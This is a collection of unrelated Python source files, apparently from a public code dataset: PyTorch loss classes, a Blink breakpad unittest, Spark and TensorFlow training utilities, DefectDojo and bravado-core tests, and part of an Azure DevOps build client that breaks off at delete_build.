def __exit__(self, exc_type, exc_value, exc_traceback):
if self.enabled:
self._end.record()
torch.cuda.synchronize()
elapsed = self._start.elapsed_time(self._end)
print(f"({os.getpid()}) {self._name} {elapsed}")
class WeightedNLLLoss(nn.Module):
"""Weight individual training examples
"""
def __init__(self):
super().__init__()
self.loss = nn.NLLLoss(reduction='none')
def forward(self, pred, y, weight):
loss = self.loss(pred, y)
weight = weight.type_as(loss)
return torch.dot(loss, weight)/len(weight)
class WeightedMultiHeadNLLLoss(nn.Module):
"""Weight individual training examples with multiple heads
"""
def __init__(self):
super().__init__()
self.loss = nn.NLLLoss(reduction='none')
def forward(self, preds, targets, weights):
loss = sum([self.loss(pred, targets[:, i]) for i, pred in enumerate(preds)])
weights = weights.type_as(loss)
return torch.dot(loss, weights)/len(weights)
class WeightedSequenceLoss(nn.Module):
"""Weight individual training examples
"""
def __init__(self, LossFn: nn.Module = nn.NLLLoss, avg: str = "token"):
super().__init__()
self.avg = avg
self.crit = LossFn(ignore_index=Offsets.PAD, reduction="none")
if avg == 'token':
self._reduce = self._mean
else:
self._reduce = self._sum
def _mean(self, loss):
return loss.mean(axis=1)
def _sum(self, loss):
return loss.sum(axis=1)
def forward(self, inputs: torch.Tensor, targets: torch.Tensor, weight: torch.Tensor) -> torch.Tensor:
"""Evaluate some loss over a sequence.
:param inputs: torch.FloatTensor, [B, T, C] The scores from the model. Batch First
:param targets: torch.LongTensor, [B, T] The labels.
:param weight: sample weights [B, ]
:returns: torch.FloatTensor, The loss.
"""
total_sz = targets.nelement()
batchsz = weight.shape[0]
loss = self.crit(inputs.view(total_sz, -1), targets.view(total_sz)).view(batchsz, -1) # [B, T]
loss = torch.dot(self._reduce(loss), weight.type_as(loss)) / batchsz
return loss
def extra_repr(self):
return f"reduction={self.avg}"
|
third_party/blink/tools/blinkpy/web_tests/breakpad/dump_reader_multipart_unittest.py | zipated/src | 2,151 | 9840 | # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from blinkpy.common.host import Host
from blinkpy.common.host_mock import MockHost
from blinkpy.web_tests.breakpad.dump_reader_multipart import DumpReaderMultipart
class TestDumpReaderMultipart(unittest.TestCase):
_MULTIPART_DUMP = [
'--boundary',
'Content-Disposition: form-data; name="prod"',
'',
'content_shell',
'--boundary',
'Content-Disposition: form-data; name="pid"',
'',
'4711',
'--boundary',
'Content-Disposition: form-data; name="upload_file_minidump"; filename="dump"',
'Content-Type: application/octet-stream',
'',
'MDMP',
'--boundary--',
]
def test_check_generate_breakpad_symbols_actually_exists(self):
host = Host()
dump_reader = DumpReaderMultipart(host, build_dir=None)
self.assertTrue(host.filesystem.exists(dump_reader._path_to_generate_breakpad_symbols()))
def test_check_is_functional_breakpad_tools_not_found(self):
host = MockHost()
build_dir = "/mock-checkout/out/Debug"
host.filesystem.maybe_make_directory(build_dir)
dump_reader = DumpReaderMultipart(host, build_dir)
dump_reader._file_extension = lambda: 'dmp'
dump_reader._binaries_to_symbolize = lambda: ['content_shell']
self.assertFalse(dump_reader.check_is_functional())
def test_get_pid_from_dump(self):
host = MockHost()
dump_file = '/crash-dumps/dump.dmp'
expected_pid = '4711'
host.filesystem.write_text_file(dump_file, "\r\n".join(TestDumpReaderMultipart._MULTIPART_DUMP))
build_dir = "/mock-checkout/out/Debug"
host.filesystem.maybe_make_directory(build_dir)
host.filesystem.exists = lambda x: True
# The mock file object returned by open_binary_file_for_reading doesn't
# have readline(), however, the real File object does.
host.filesystem.open_binary_file_for_reading = host.filesystem.open_text_file_for_reading
dump_reader = DumpReaderMultipart(host, build_dir)
dump_reader._file_extension = lambda: 'dmp'
dump_reader._binaries_to_symbolize = lambda: ['content_shell']
self.assertTrue(dump_reader.check_is_functional())
self.assertEqual(expected_pid, dump_reader._get_pid_from_dump(dump_file))
def test_get_stack_from_dump(self):
host = MockHost()
dump_file = '/crash-dumps/dump.dmp'
host.filesystem.write_text_file(dump_file, "\r\n".join(TestDumpReaderMultipart._MULTIPART_DUMP))
build_dir = "/mock-checkout/out/Debug"
host.filesystem.maybe_make_directory(build_dir)
host.filesystem.exists = lambda x: True
# The mock file object returned by open_binary_file_for_reading doesn't
# have readline(), however, the real File object does.
host.filesystem.open_binary_file_for_reading = host.filesystem.open_text_file_for_reading
dump_reader = DumpReaderMultipart(host, build_dir)
dump_reader._file_extension = lambda: 'dmp'
dump_reader._binaries_to_symbolize = lambda: ['content_shell']
self.assertTrue(dump_reader.check_is_functional())
self.assertEqual("MOCK output of child process", dump_reader._get_stack_from_dump(dump_file))
self.assertEqual(2, len(host.executive.calls))
cmd_line = " ".join(host.executive.calls[0])
self.assertIn('generate_breakpad_symbols.py', cmd_line)
cmd_line = " ".join(host.executive.calls[1])
self.assertIn('minidump_stackwalk', cmd_line)
|
Chapter04/python/2.0.0/com/sparksamples/util.py | quguiliang/Machine-Learning-with-Spark-Second-Edition | 112 | 9848 | <gh_stars>100-1000
import os
import sys
from pyspark.sql.types import *
PATH = "/home/ubuntu/work/ml-resources/spark-ml/data"
SPARK_HOME = "/home/ubuntu/work/spark-2.0.0-bin-hadoop2.7/"
os.environ['SPARK_HOME'] = SPARK_HOME
sys.path.append(SPARK_HOME + "/python")
from pyspark import SparkContext
from pyspark import SparkConf
from pyspark.sql import SparkSession
conf = SparkConf().setAppName("First Spark App").setMaster("local")
sc = SparkContext(conf=conf)
spark = SparkSession(sc)
def get_user_data():
custom_schema = StructType([
StructField("no", StringType(), True),
StructField("age", IntegerType(), True),
StructField("gender", StringType(), True),
StructField("occupation", StringType(), True),
StructField("zipCode", StringType(), True)
])
from pyspark.sql import SQLContext
from pyspark.sql.types import *
sql_context = SQLContext(sc)
user_df = sql_context.read \
.format('com.databricks.spark.csv') \
.options(header='false', delimiter='|') \
.load("%s/ml-100k/u.user" % PATH, schema = custom_schema)
return user_df
def get_movie_data_df():
custom_schema = StructType([
StructField("no", StringType(), True),
StructField("moviename", StringType(), True),
StructField("date", StringType(), True),
StructField("f1", StringType(), True), StructField("url", StringType(), True),
StructField("f2", IntegerType(), True), StructField("f3", IntegerType(), True),
StructField("f4", IntegerType(), True), StructField("f5", IntegerType(), True),
StructField("f6", IntegerType(), True), StructField("f7", IntegerType(), True),
StructField("f8", IntegerType(), True), StructField("f9", IntegerType(), True),
StructField("f10", IntegerType(), True), StructField("f11", IntegerType(), True),
StructField("f12", IntegerType(), True), StructField("f13", IntegerType(), True),
StructField("f14", IntegerType(), True), StructField("f15", IntegerType(), True),
StructField("f16", IntegerType(), True), StructField("f17", IntegerType(), True),
StructField("f18", IntegerType(), True), StructField("f19", IntegerType(), True)
])
from pyspark.sql import SQLContext
from pyspark.sql.types import *
sql_context = SQLContext(sc)
movie_df = sql_context.read \
.format('com.databricks.spark.csv') \
.options(header='false', delimiter='|') \
.load("%s/ml-100k/u.item" % PATH, schema = custom_schema)
return movie_df
def get_movie_data():
return sc.textFile("%s/ml-100k/u.item" % PATH)
def get_rating_data():
return sc.textFile("%s/ml-100k/u.data" % PATH)
|
original/baselines/train/JointE+ONE.py | thunlp/JointNRE | 186 | 9882 | #coding:utf-8
import numpy as np
import tensorflow as tf
import os
import time
import datetime
import ctypes
import threading
import json
ll1 = ctypes.cdll.LoadLibrary
lib_cnn = ll1("./init_cnn.so")
ll2 = ctypes.cdll.LoadLibrary
lib_kg = ll2("./init_know.so")
class Config(object):
def __init__(self):
self.instanceTot = lib_cnn.getInstanceTot()
self.sequence_size = lib_cnn.getLenLimit()
self.num_classes = lib_cnn.getRelationTotal()
self.num_words = lib_cnn.getWordTotal()
self.num_positions = 2 * lib_cnn.getPositionLimit() + 1
self.word_size = lib_cnn.getWordDimension()
self.position_size = 5
self.embedding_size = self.word_size + self.position_size * 2
self.filter_size = 3
self.num_filters = 230
self.relation_size = self.word_size#230
self.dropout_keep_prob = 0.5
self.l2_lambda = 0.0001
self.NA = 51
lib_cnn.setNA(self.NA)
lib_cnn.setRate(3)
self.margin = 1.0
self.nbatches = 100
self.trainTimes = 15
self.entityTotal = 0
self.relationTotal = 0
class Model(object):
def __init__(self, config):
sequence_size = config.sequence_size
num_classes = config.num_classes
num_words = config.num_words
num_positions = config.num_positions
embedding_size = config.embedding_size
word_size = config.word_size
position_size = config.position_size
relation_size = config.relation_size
filter_size = config.filter_size
num_filters = config.num_filters
dropout_keep_prob = config.dropout_keep_prob
margin = config.margin
l2_lambda = config.l2_lambda
self.input_x = tf.placeholder(tf.int32, [None, sequence_size], name = "input_x")
self.input_p_h = tf.placeholder(tf.int32, [None, sequence_size], name = "input_p_h")
self.input_p_t = tf.placeholder(tf.int32, [None, sequence_size], name = "input_p_t")
self.input_r = tf.placeholder(tf.float32, [1, 1], name = "input_r")
self.input_r_n = tf.placeholder(tf.float32, [1, 1], name = "input_r_n")
self.input_h = tf.placeholder(tf.int32, [1, 1], name = "input_h")
self.input_t = tf.placeholder(tf.int32, [1, 1], name = "input_t")
self.input_y = tf.placeholder(tf.float32, [1, num_classes], name = "input_y")
self.pos_h = tf.placeholder(tf.int32, [None])
self.pos_t = tf.placeholder(tf.int32, [None])
self.pos_r = tf.placeholder(tf.int32, [None])
self.neg_h = tf.placeholder(tf.int32, [None])
self.neg_t = tf.placeholder(tf.int32, [None])
self.neg_r = tf.placeholder(tf.int32, [None])
l2_loss = tf.constant(0.0)
with tf.name_scope("embedding-lookup"):
self.word_embeddings = tf.Variable(word_embeddings, name="word_embeddings")
self.relation_embeddings = tf.get_variable("relation_embeddings", [config.relationTotal, word_size])
self.position_embeddings = tf.get_variable("position_embeddings", [num_positions, position_size])
self.relation_attention = tf.get_variable("relation_attention", [num_classes, relation_size])
self.NAattention = tf.get_variable("NAattention", [relation_size, 1])
self.attention = tf.get_variable("attention", [num_filters, relation_size])
#know
pos_h_e = tf.nn.embedding_lookup(self.word_embeddings, self.pos_h)
pos_t_e = tf.nn.embedding_lookup(self.word_embeddings, self.pos_t)
pos_r_e = tf.nn.embedding_lookup(self.relation_embeddings, self.pos_r)
neg_h_e = tf.nn.embedding_lookup(self.word_embeddings, self.neg_h)
neg_t_e = tf.nn.embedding_lookup(self.word_embeddings, self.neg_t)
neg_r_e = tf.nn.embedding_lookup(self.relation_embeddings, self.neg_r)
#cnn
self.x_initial = tf.nn.embedding_lookup(self.word_embeddings, self.input_x)
self.x_p_h = tf.nn.embedding_lookup(self.position_embeddings, self.input_p_h)
self.x_p_t = tf.nn.embedding_lookup(self.position_embeddings, self.input_p_t)
self.x = tf.expand_dims(tf.concat(2, [self.x_initial, self.x_p_h, self.x_p_t]), -1)
self.head = tf.nn.embedding_lookup(self.word_embeddings, self.input_h)
self.tail = tf.nn.embedding_lookup(self.word_embeddings, self.input_t)
l2_loss += tf.nn.l2_loss(self.attention)
with tf.name_scope("conv-maxpool"):
self.W = tf.get_variable("W", [filter_size, embedding_size, 1, num_filters])
self.b = tf.get_variable("b", [num_filters])
conv = tf.nn.conv2d(self.x, self.W, strides=[1, 1, 1, 1], padding="VALID", name="conv")
h = tf.nn.tanh(tf.nn.bias_add(conv, self.b), name="tanh")
self.y = tf.nn.max_pool(h, ksize=[1, sequence_size - filter_size + 1, 1, 1], strides=[1, 1, 1, 1], padding='VALID', name="pool")
l2_loss += tf.nn.l2_loss(self.W)
l2_loss += tf.nn.l2_loss(self.b)
self.y = tf.reshape(self.y, [-1, num_filters])
with tf.name_scope('attention'):
self.y_attention = tf.reduce_max(self.y, 0 , keep_dims = True)
with tf.name_scope("dropout"):
self.y_attention = tf.nn.l2_normalize(self.y_attention, 1)
self.h_drop = tf.nn.dropout(self.y_attention, dropout_keep_prob)
self.transfer_w = tf.get_variable("transfer_w", [num_filters, num_classes])
self.scores = tf.matmul(self.h_drop, self.transfer_w)
l2_loss += tf.nn.l2_loss(self.transfer_w)
with tf.name_scope("loss"):
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(self.scores, self.input_y)
self.loss_cnn = tf.reduce_mean(cross_entropy) + l2_lambda * l2_loss
pos = tf.reduce_sum(abs(pos_h_e + pos_r_e - pos_t_e), 1, keep_dims = True)
neg = tf.reduce_sum(abs(neg_h_e + neg_r_e - neg_t_e), 1, keep_dims = True)
self.loss_kg = tf.reduce_sum(tf.maximum(pos - neg + margin, 0))
with tf.name_scope("accuracy"):
self.predictions = tf.argmax(self.scores, 1, name="predictions")
correct_predictions = tf.equal(self.predictions, tf.argmax(self.input_y, 1))
self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, "float"), name="accuracy")
bags_sum = 0.0
bags_hit_NA = 0.0
sum_NA = 0.0
sum_fNA = 0.0
bags_hit = 0.0
loss_sum = 0.0
if __name__ == "__main__":
lib_cnn.readWordVec()
lib_cnn.readFromFile()
lib_kg.init()
np.random.seed(0)
tf.set_random_seed(0)
config = Config()
word_embeddings = np.zeros(config.num_words * config.word_size, dtype = np.float32)
lib_cnn.getWordVec.argtypes = [ctypes.c_void_p]
lib_cnn.getWordVec(word_embeddings.__array_interface__['data'][0])
word_embeddings.resize((config.num_words,config.word_size))
config.batch_size = lib_kg.getTripleTotal() / config.nbatches
config.entityTotal = lib_kg.getEntityTotal()
config.relationTotal = lib_kg.getRelationTotal()
with tf.Graph().as_default():
conf = tf.ConfigProto()
sess = tf.Session(config=conf)
with sess.as_default():
initializer = tf.contrib.layers.xavier_initializer()
with tf.variable_scope("model", reuse=None, initializer = initializer):
m = Model(config = config)
global_step_cnn = tf.Variable(0, name="global_step_cnn", trainable=False)
optimizer_cnn = tf.train.GradientDescentOptimizer(0.01)
grads_and_vars_cnn = optimizer_cnn.compute_gradients(m.loss_cnn)
train_op_cnn = optimizer_cnn.apply_gradients(grads_and_vars_cnn, global_step = global_step_cnn)
global_step_kg = tf.Variable(0, name="global_step_kg", trainable=False)
optimizer_kg = tf.train.GradientDescentOptimizer(0.001)
grads_and_vars_kg = optimizer_kg.compute_gradients(m.loss_kg)
train_op_kg = optimizer_kg.apply_gradients(grads_and_vars_kg, global_step=global_step_kg)
sess.run(tf.initialize_all_variables())
def outEmbedding(str1):
word_embeddings, relation_embeddings, position_embeddings, relation_attention, attention, W, B, transfer_w, transfer_b, softmax_w, softmax_b = sess.run([m.word_embeddings, m.relation_embeddings, m.position_embeddings, m.relation_attention, m.attention, m.W, m.b, m.transfer_w, m.transfer_b, m.softmax_w, m.softmax_b])
log = open("log"+str1+".txt", "w")
log.write(json.dumps(word_embeddings.tolist())+"\n")
log.write(json.dumps(relation_embeddings.tolist())+"\n")
log.write(json.dumps(position_embeddings.tolist())+"\n")
log.write(json.dumps(relation_attention.tolist())+"\n")
log.write(json.dumps(attention.tolist())+"\n")
log.write(json.dumps(W.tolist())+"\n")
log.write(json.dumps(B.tolist())+"\n")
log.write(json.dumps(transfer_w.tolist())+"\n")
NAattention = sess.run(m.NAattention)
log.write(json.dumps(NAattention.tolist()) + "\n")
log.close()
x_batch = np.zeros((config.instanceTot,config.sequence_size), dtype = np.int32)
p_t_batch = np.zeros((config.instanceTot,config.sequence_size), dtype = np.int32)
p_h_batch = np.zeros((config.instanceTot,config.sequence_size), dtype = np.int32)
r_batch = np.zeros((1, 1), dtype = np.int32)
y_batch = np.zeros((1, config.num_classes), dtype = np.int32)
r_n_batch = np.zeros((1, 1), dtype = np.float32)
h_batch = np.zeros((1, 1), dtype = np.int32)
t_batch = np.zeros((1, 1), dtype = np.int32)
x_batch_addr = x_batch.__array_interface__['data'][0]
p_t_batch_addr = p_t_batch.__array_interface__['data'][0]
p_h_batch_addr = p_h_batch.__array_interface__['data'][0]
y_batch_addr = y_batch.__array_interface__['data'][0]
r_batch_addr = r_batch.__array_interface__['data'][0]
r_n_batch_addr = r_n_batch.__array_interface__['data'][0]
h_batch_addr = h_batch.__array_interface__['data'][0]
t_batch_addr = t_batch.__array_interface__['data'][0]
lib_cnn.batch_iter.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p]
tipTotal = lib_cnn.getTipTotal()
loop = 0
def train_cnn(coord):
def train_step_cnn(x_batch, p_h_batch, p_t_batch, y_batch, r_batch, r_n_batch, h_batch, t_batch):
global bags_sum, bags_hit, loss_sum, bags_hit_NA, bags_hit, sum_fNA, sum_NA
feed_dict = {
m.input_x: x_batch,
m.input_p_h: p_h_batch,
m.input_p_t: p_t_batch,
m.input_r: r_batch,
m.input_r_n: r_n_batch,
m.input_y: y_batch,
m.input_h: h_batch,
m.input_t: t_batch
}
_, step, loss, accuracy = sess.run(
[train_op_cnn, global_step_cnn, m.loss_cnn, m.accuracy], feed_dict)
time_str = datetime.datetime.now().isoformat()
loss_sum += loss
bags_sum += 1
if (r_batch[0]!=config.NA):
sum_fNA += 1
if accuracy > 0.5:
bags_hit += 1.0
else:
sum_NA += 1
if accuracy > 0.5:
bags_hit_NA += 1.0
if bags_sum % 1000 == 0:
if (sum_NA == 0):
sum_NA+=1
if (sum_fNA == 0):
sum_fNA+=1
print("{}: step {}, loss {:g}, acc {:g} acc {:g} {} {}".format(time_str, step, loss_sum/bags_sum, bags_hit_NA/sum_NA, bags_hit/sum_fNA, sum_NA, sum_fNA))
global loop
while not coord.should_stop():
print 'Looping ', loop
outEmbedding(str(loop))
for i in range(tipTotal):
length = lib_cnn.batch_iter(x_batch_addr, p_h_batch_addr, p_t_batch_addr, y_batch_addr, r_batch_addr, r_n_batch_addr, h_batch_addr, t_batch_addr)
train_step_cnn(x_batch[0:length,], p_h_batch[0:length,], p_t_batch[0:length,], y_batch, r_batch, r_n_batch, h_batch, t_batch)
global bags_sum, bags_hit, loss_sum, bags_hit_NA, bags_hit, sum_fNA, sum_NA
bags_sum = 0
bags_hit = 0
bags_hit_NA = 0
loss_sum = 0
sum_fNA = 0
sum_NA = 0
loop += 1
if loop == config.trainTimes:
coord.request_stop()
ph = np.zeros(config.batch_size * 2, dtype = np.int32)
pt = np.zeros(config.batch_size * 2, dtype = np.int32)
pr = np.zeros(config.batch_size * 2, dtype = np.int32)
nh = np.zeros(config.batch_size * 2, dtype = np.int32)
nt = np.zeros(config.batch_size * 2, dtype = np.int32)
nr = np.zeros(config.batch_size * 2, dtype = np.int32)
ph_addr = ph.__array_interface__['data'][0]
pt_addr = pt.__array_interface__['data'][0]
pr_addr = pr.__array_interface__['data'][0]
nh_addr = nh.__array_interface__['data'][0]
nt_addr = nt.__array_interface__['data'][0]
nr_addr = nr.__array_interface__['data'][0]
lib_kg.getBatch.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int]
times_kg = 0
def train_kg(coord):
def train_step_kg(pos_h_batch, pos_t_batch, pos_r_batch, neg_h_batch, neg_t_batch, neg_r_batch):
feed_dict = {
m.pos_h: pos_h_batch,
m.pos_t: pos_t_batch,
m.pos_r: pos_r_batch,
m.neg_h: neg_h_batch,
m.neg_t: neg_t_batch,
m.neg_r: neg_r_batch
}
_, step, loss = sess.run(
[train_op_kg, global_step_kg, m.loss_kg], feed_dict)
return loss
global times_kg
while not coord.should_stop():
times_kg += 1
res = 0.0
for batch in range(config.nbatches):
lib_kg.getBatch(ph_addr, pt_addr, pr_addr, nh_addr, nt_addr, nr_addr, config.batch_size)
res += train_step_kg(ph, pt, pr, nh, nt, nr)
coord = tf.train.Coordinator()
threads = []
threads.append(threading.Thread(target=train_kg, args=(coord,)))
threads.append(threading.Thread(target=train_cnn, args=(coord,)))
for t in threads: t.start()
coord.join(threads)
|
unittests/test_apiv2_user.py | mtcolman/django-DefectDojo | 249 | 9910 | <reponame>mtcolman/django-DefectDojo
from rest_framework.test import APITestCase, APIClient
from django.urls import reverse
from rest_framework.authtoken.models import Token
class UserTest(APITestCase):
"""
Test the User APIv2 endpoint.
"""
fixtures = ['dojo_testdata.json']
def setUp(self):
token = Token.objects.get(user__username='admin')
self.client = APIClient()
self.client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
def test_user_list(self):
r = self.client.get(reverse('user-list'))
self.assertEqual(r.status_code, 200, r.content[:1000])
user_list = r.json()['results']
self.assertTrue(len(user_list) >= 1, r.content[:1000])
for user in user_list:
for item in ['username', 'first_name', 'last_name', 'email']:
self.assertIn(item, user, r.content[:1000])
for item in ['password']:
self.assertNotIn(item, user, r.content[:1000])
def test_user_add(self):
# simple user without password
r = self.client.post(reverse('user-list'), {
"username": "api-user-1"
}, format='json')
self.assertEqual(r.status_code, 201, r.content[:1000])
# user with good password
password = '<PASSWORD>!@#$'
r = self.client.post(reverse('user-list'), {
"username": "api-user-2",
"password": password
}, format='json')
self.assertEqual(r.status_code, 201, r.content[:1000])
# test password by fetching API key
r = self.client.post(reverse('api-token-auth'), {
"username": "api-user-2",
"password": password
}, format='json')
self.assertEqual(r.status_code, 200, r.content[:1000])
# user with weak password
r = self.client.post(reverse('user-list'), {
"username": "api-user-3",
"password": "<PASSWORD>"
}, format='json')
self.assertEqual(r.status_code, 400, r.content[:1000])
self.assertIn('The password must contain at least 1 digit, 0-9.', r.content.decode("utf-8"))
def test_user_change_password(self):
# some user
r = self.client.post(reverse('user-list'), {
"username": "api-user-4"
}, format='json')
self.assertEqual(r.status_code, 201, r.content[:1000])
user_id = r.json()['id']
r = self.client.put("{}{}/".format(reverse('user-list'), user_id), {
"username": "api-user-4",
"first_name": "first"
}, format='json',)
self.assertEqual(r.status_code, 200, r.content[:1000])
r = self.client.patch("{}{}/".format(reverse('user-list'), user_id), {
"last_name": "last"
}, format='json')
self.assertEqual(r.status_code, 200, r.content[:1000])
r = self.client.put("{}{}/".format(reverse('user-list'), user_id), {
"username": "api-user-4",
"password": "<PASSWORD>!@#$"
}, format='json')
self.assertEqual(r.status_code, 400, r.content[:1000])
self.assertIn("Update of password though API is not allowed", r.content.decode("utf-8"))
r = self.client.patch("{}{}/".format(reverse('user-list'), user_id), {
"password": "<PASSWORD>!@#$"
}, format='json')
self.assertEqual(r.status_code, 400, r.content[:1000])
self.assertIn("Update of password though API is not allowed", r.content.decode("utf-8"))
|
tests/param/get_param_type_spec_test.py | nickgaya/bravado-core | 122 | 9926 | # -*- coding: utf-8 -*-
import pytest
from mock import Mock
from bravado_core.exception import SwaggerMappingError
from bravado_core.operation import Operation
from bravado_core.param import get_param_type_spec
from bravado_core.param import Param
from bravado_core.spec import Spec
@pytest.fixture
def body_param_spec():
return {
'name': 'body',
'in': 'body',
'description': 'pet id',
'required': True,
'schema': {
'type': 'string',
},
}
def test_location_is_body(empty_swagger_spec, body_param_spec):
param = Param(empty_swagger_spec, Mock(spec=Operation), body_param_spec)
assert body_param_spec['schema'] == get_param_type_spec(param)
def test_location_is_not_body(empty_swagger_spec):
for location in ('path', 'query', 'header', 'formData',):
param_spec = {
'name': 'petId',
'in': location,
'description': 'ID of pet that needs to be updated',
'required': True,
'type': 'string',
}
param = Param(empty_swagger_spec, Mock(spec=Operation), param_spec)
assert param_spec == get_param_type_spec(param)
def test_location_invalid(empty_swagger_spec, body_param_spec):
body_param_spec['in'] = 'foo'
param = Param(empty_swagger_spec, Mock(spec=Operation), body_param_spec)
with pytest.raises(SwaggerMappingError) as excinfo:
get_param_type_spec(param)
assert 'location foo' in str(excinfo.value)
def test_ref(minimal_swagger_dict, body_param_spec):
minimal_swagger_dict['parameters'] = {
'PetIdParam': body_param_spec,
}
param_ref_spec = {'$ref': '#/parameters/PetIdParam'}
swagger_spec = Spec(minimal_swagger_dict)
param = Param(swagger_spec, Mock(spec=Operation), param_ref_spec)
assert {'type': 'string'} == get_param_type_spec(param)
|
azure-devops/azure/devops/released/build/build_client.py | imafidon2020/azure-devops-python-api | 248 | 9934 | <filename>azure-devops/azure/devops/released/build/build_client.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest import Serializer, Deserializer
from ...client import Client
from ...v5_1.build import models
class BuildClient(Client):
"""Build
:param str base_url: Service URL
:param Authentication creds: Authenticated credentials.
"""
def __init__(self, base_url=None, creds=None):
super(BuildClient, self).__init__(base_url, creds)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
resource_area_identifier = '965220d5-5bb9-42cf-8d67-9b146df2a5a4'
def create_artifact(self, artifact, project, build_id):
"""CreateArtifact.
Associates an artifact with a build.
:param :class:`<BuildArtifact> <azure.devops.v5_1.build.models.BuildArtifact>` artifact: The artifact.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:rtype: :class:`<BuildArtifact> <azure.devops.v5_1.build.models.BuildArtifact>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
content = self._serialize.body(artifact, 'BuildArtifact')
response = self._send(http_method='POST',
location_id='1db06c96-014e-44e1-ac91-90b2d4b3e984',
version='5.1',
route_values=route_values,
content=content)
return self._deserialize('BuildArtifact', response)
def get_artifact(self, project, build_id, artifact_name):
"""GetArtifact.
Gets a specific artifact for a build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:param str artifact_name: The name of the artifact.
:rtype: :class:`<BuildArtifact> <azure.devops.v5_1.build.models.BuildArtifact>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
query_parameters = {}
if artifact_name is not None:
query_parameters['artifactName'] = self._serialize.query('artifact_name', artifact_name, 'str')
response = self._send(http_method='GET',
location_id='1db06c96-014e-44e1-ac91-90b2d4b3e984',
version='5.1',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('BuildArtifact', response)
def get_artifact_content_zip(self, project, build_id, artifact_name, **kwargs):
"""GetArtifactContentZip.
Gets a specific artifact for a build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:param str artifact_name: The name of the artifact.
:rtype: object
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
query_parameters = {}
if artifact_name is not None:
query_parameters['artifactName'] = self._serialize.query('artifact_name', artifact_name, 'str')
response = self._send(http_method='GET',
location_id='1db06c96-014e-44e1-ac91-90b2d4b3e984',
version='5.1',
route_values=route_values,
query_parameters=query_parameters,
accept_media_type='application/zip')
if "callback" in kwargs:
callback = kwargs["callback"]
else:
callback = None
return self._client.stream_download(response, callback=callback)
def get_artifacts(self, project, build_id):
"""GetArtifacts.
Gets all artifacts for a build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:rtype: [BuildArtifact]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
response = self._send(http_method='GET',
location_id='1db06c96-014e-44e1-ac91-90b2d4b3e984',
version='5.1',
route_values=route_values)
return self._deserialize('[BuildArtifact]', self._unwrap_collection(response))
def get_file(self, project, build_id, artifact_name, file_id, file_name, **kwargs):
"""GetFile.
Gets a file from the build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:param str artifact_name: The name of the artifact.
:param str file_id: The primary key for the file.
:param str file_name: The name that the file will be set to.
:rtype: object
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
query_parameters = {}
if artifact_name is not None:
query_parameters['artifactName'] = self._serialize.query('artifact_name', artifact_name, 'str')
if file_id is not None:
query_parameters['fileId'] = self._serialize.query('file_id', file_id, 'str')
if file_name is not None:
query_parameters['fileName'] = self._serialize.query('file_name', file_name, 'str')
response = self._send(http_method='GET',
location_id='1db06c96-014e-44e1-ac91-90b2d4b3e984',
version='5.1',
route_values=route_values,
query_parameters=query_parameters,
accept_media_type='application/octet-stream')
if "callback" in kwargs:
callback = kwargs["callback"]
else:
callback = None
return self._client.stream_download(response, callback=callback)
def delete_build(self, project, build_id):
